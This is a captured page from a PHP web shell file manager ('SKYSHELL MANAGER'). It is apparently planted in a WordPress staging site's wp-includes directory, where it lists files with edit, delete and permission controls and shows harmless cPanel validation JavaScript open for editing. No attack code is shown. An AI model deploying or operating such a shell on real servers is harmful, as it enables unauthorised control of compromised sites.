📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: conf.min.js
YAHOO.util.Event.onDOMReady((function(){if(YAHOO.util.Dom.get("frmChangeConf")){var e=YAHOO.util.Dom.get("boxtrapper_daystokeep"),t=new CPANEL.validate.validator(LOCALE.maketext("The number of days that you wish to keep logs and messages in the queue:"));t.add(e,(function(){return CPANEL.validate.positive_integer(e.value)}),LOCALE.maketext("The number of days to keep logs must be a positive integer.")),t.attach();var a=YAHOO.util.Dom.get("boxtrapper_minspamscore"),s=new CPANEL.validate.validator(LOCALE.maketext("Minimum [asis,Apache] [asis,SpamAssassin] Spam Score required to bypass [asis,BoxTrapper]:"));s.add(a,(function(){return/^-?[0-9]+(\.[0-9]+)?$/.test(a.value)}),LOCALE.maketext("The minimum spam score must be numeric.")),s.attach(),YAHOO.util.Event.on("frmChangeConf","submit",(function(e){var a=[];t.is_valid()||a.push(t.error_messages()),s.is_valid()||a.push(s.error_messages()),a.length&&YAHOO.util.Event.preventDefault(e)}))}}));
Save